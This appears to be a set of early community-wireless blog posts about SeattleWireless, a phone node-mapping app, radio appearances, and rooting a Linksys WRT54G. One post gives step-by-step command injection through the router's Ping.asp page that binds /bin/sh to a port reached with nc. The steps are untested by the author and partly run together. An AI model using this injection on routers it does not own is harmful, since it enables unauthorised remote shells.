Casey has been having some fun with the Wireless Ontology. He’s written a neat little RDF powered app called WiSPoT that displays node locations on your phone. Very cool.

CJ Collier has released a package for getting that shell on the LinksysWRT54g
First it was Rob and Linksys. Now it’s SeattleWireless TV.
Well, slashdot has picked up Rob’s post. Comments are typical slashdot, but we’ll see what comes of it. One thing is for sure, he’ll never get an RMA on that brick now.
Ross Jordan is smart. He figured out how to get a shell on the little blue box.
I haven’t tested this yet (it’s too hot, it’s late, and I dont want to fry my wrt at the moment), but here are the steps:
Firmware 1.30 is required
Go to http://192.168.1.1/Ping.asp
`cp /usr/sbin/epi_ttcp /tmp/t`
click ‘ping’
Go to http://192.168.1.1/Ping.asp
`/tmp/t -r -p 10 > /tmp/fa&`
click ‘ping’
on your PC, download Rob’s mips compiled faucet
and the CERN version of ttcp (compile it on your PC)
On your PC, create a loop to transfer faucet to the AP
while `/bin/true`; do ttcp -t -p 10 Go to http://192.168.1.1/Ping.asp`/tmp/fa 99 -ioe /bin/sh`click ‘ping’
From your PC:
nc 192.168.1.1 99At this point, you should be on your WRT and happy. If you’re not, you’ve becom
e part of the brickmakers union.
- Passing commands through Ping.asp
- Picking through the Linksys GPL Code center
I’m going to be on 94.9FM, KUOW’s Weekday with Steve Scher tomorrow at 10AM. The topic is “What you need to know about your wireless future”. Never done a live call-in radio show, should be fun.
They have a live stream, as well as archives.
| Went and checked out NodeViceroy this weekend, it’s 2 blocks away, and should be an easy link. Using my iBook, I got signal and was able to hit the rest of the network with no antenna! I also got a chance to take some photos, and add to Panoramas Gigantus |

I’m going to be on Tom Herriman’s radio show, the KBCS Community Report, talking about SeattleWireless.
It’s 91.3 KBCS FM at 5PM today. If you dont get a chance to hear it, it looks like they post archives here.
Darrin Eden is now the Personal Telco Project’s guy-in-charge. Pictures of ballot boxes and people milling about are here. His acceptance speech is available here.
